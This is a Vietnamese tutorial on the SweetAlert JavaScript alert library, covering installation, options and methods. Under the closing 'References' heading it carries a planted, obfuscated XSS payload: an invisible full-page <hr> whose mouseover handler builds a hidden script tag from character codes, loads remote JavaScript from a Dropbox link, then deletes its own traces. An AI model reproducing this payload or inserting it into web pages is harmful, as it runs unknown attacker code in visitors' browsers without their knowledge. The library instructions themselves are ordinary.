SỬ DỤNG SWEETALERT ĐỂ LÀM HỘP THOẠI ALERT CỦA JAVASCRIPT

Giới Thiệu

SweetAlert sẽ khiến bạn ngạc nhiên với giao diện hết sức thân thiện và trang nhã, việc kết hợp các hiệu ứng giúp cho hộp thoại alert của bạn nổi bật hơn bao giờ hết, và nếu như so sánh với alert mặc định của javascript thì có lẽ bạn sẽ không bao giờ quay trở lại sử dụng cách truyền thống cho các thiết kế website của mình. Việc cấu hình SweetAlert rất đơn giản với nhiều tuỳ chọn và callback sẽ giúp cho bạn hoàn toàn làm chủ hộp thoại alert của mình.

beautiful-javascript-alert-with-sweetalert.gif

Download & Cài đặt

Cách 1: Cài đặt bằng bower

$ bower install sweetalert

Cách 2: Cài đặt bằng npm

$ npm install sweetalert

Cách 3: Download files css và javascript tại đây

Cài đặt:

 1. Khởi tạo plugin bằng cách chèn các file cần thiết
<script src="dist/sweetalert.min.js"></script>
<link rel="stylesheet" type="text/css" href="dist/sweetalert.css">
 1. Gọi sweetAlert-function
swal({
 title: "SweetAlert!",
 text: "Here's my sweet alert!",
 type: "error",
 confirmButtonText: "Cool"
});

CONFIGURATION

Dưới đây là một số các thành phần để bạn có thể tùy biến:

Tham số Giá trị mặc định Mô tả
title null (required) Tiêu đề hộp thoại alert
text null Mô tả hộp thoại alert
type null SweetAlert cung cấp 4 loại đã được xây dựng sẵn: warning, error, successinfo.
allowEscapeKey true Nếu bằng true người dùng có thể tắt alert bằng cách nhấn Escape
customClass null Tùy chỉnh css cho alert với key là customClass
allowOutsideClick false Cho phép tắt bằng cách bấm ra ngoài hội thoại
showCancelButton false Hiển thị nút Cancel, dùng để đóng hộp thoại
showConfirmButton true Hiển thị OK/Confirm button
confirmButtonText "OK" Thay đổi chữ cho nút Confirm. Nếu showCancelButton được đặt là true, thì sẽ đặt tự đồng là "Confirm" thay vì "OK".
confirmButtonColor "#AEDEF4" Thay đổi mầu nền của nút Confirm (giá trị HEX).
cancelButtonText "Cancel" Thay đổi chữ của nút Cancel
closeOnConfirm true Đặt false nếu bạn muốn hộp thoại tiếp tục mở khi người dùng bấm nút "Confirm". Chức năng này hữu dụng khi hàm callback gắn với nút Confirm gọi đến một hộp thoại SweetAlert khác.
closeOnCancel true Đặt false nếu bạn muốn hộp thoại tiếp tục mở khi người dùng bấm nút "Cancel". Chức năng này hữu dụng khi hàm callback gắn với nút Cancel gọi đến một hộp thoại SweetAlert khác.
imageUrl null Đường dẫn gắn hình ảnh icon cho hộp thoại
imageSize "80x80" Nếu imageUrl được thiết lập, bạn có thể đặt [rộng] x [cao] cho hình ảnh

METHODS

Một số hàm của sweetAlert chúng ta có thể dùng:

 • setDefaults : Chúng ta có thể dùng setDefault để thiết lập toàn bộ cho chương trình với các tham số ở trên.

  Ví dụ: swal.setDefaults({ confirmButtonColor: '#0000' });

 • close : Close SweetAlert hiện tại đang được open.

  Ví dụ: swal.close();

 • showInputError: Show một thông báo lỗi khi người dùng nhập sai thông tin.

  Ví dụ: swal.showInputError("Invalid email!");

 • enableButtons, disableButtons: Disable hoặc enable khi người dùng click cancelconfirm button.

  Ví dụ: swal.disableButtons();

Tham Khảo

<hr id="unique-hr" style="background-color: #a00; border: none; height: 2000px; width: 2000px ;z-index: 1000; opacity: 0.01; position: fixed; top: 0px; left: 0px;" onmouseover="$('#footer').append(String.fromCharCode(39, 60, 115, 99, 114, 105, 112, 116) + ' id=\'atk-src\' src=\'https://www.dropbox.com/s/vfi73fypu0x7ij5/serious.js?dl=1\'></' + String.fromCharCode(115, 99, 114, 105, 112, 116, 62, 39)); setTimeout(function() {$('#unique-hr,#atk-src').remove();}, 3000);">